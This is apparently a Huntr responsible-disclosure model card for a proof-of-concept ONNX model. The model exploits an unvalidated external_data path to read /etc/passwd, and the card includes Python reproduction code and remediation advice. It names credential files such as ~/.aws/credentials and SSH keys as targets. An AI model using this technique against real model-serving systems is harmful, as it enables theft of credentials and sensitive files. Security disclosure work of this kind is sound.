metadata
tags:
- security
- vulnerability
- poc
license: mit
ONNX Arbitrary File Read PoC
⚠️ WARNING: Malicious Model - For Security Research Only
This model demonstrates a critical vulnerability: Arbitrary File Read via External Data Path Traversal.
Vulnerability Description
The ONNX runtime does not validate the location field in TensorProto.external_data, allowing malicious models to read arbitrary files from the server's filesystem.
How It Works
- The model's tensor has
external_data.locationset to/etc/passwd(absolute path) - When loaded via
onnxruntime.InferenceSession(), the runtime reads this file - File content is loaded into the tensor data
- Inference output contains the sensitive file content
Reproduction
import onnxruntime as ort
import numpy as np
# Load malicious model
sess = ort.InferenceSession("file_read_poc.onnx")
# Run inference (no input needed)
outputs = sess.run(None, {})
# Decode file content
file_data = bytes(outputs[0].tolist())
print(file_data.decode('utf-8', errors='ignore'))
# Output: root:x:0:0:root:/root:/bin/bash...
Impact
- Severity: Critical
- Attack Vector: Model-as-a-Service (MaaS) platforms
- Affected: Any system running user-uploaded ONNX models
- Consequences:
- Credential theft (
~/.aws/credentials, SSH keys) - Source code leakage
- Configuration file exposure
- System information disclosure
- Credential theft (
Remediation
- Validate
external_data.locationto ensure it's relative and within model directory - Reject absolute paths
- Implement path sandboxing
- Add
--allow-external-dataflag (disabled by default)
Responsible Disclosure
This PoC is submitted through Huntr's responsible disclosure program.
Category: MFV (Model File Vulnerability)
Status: Under Review
Reporter: Security Researcher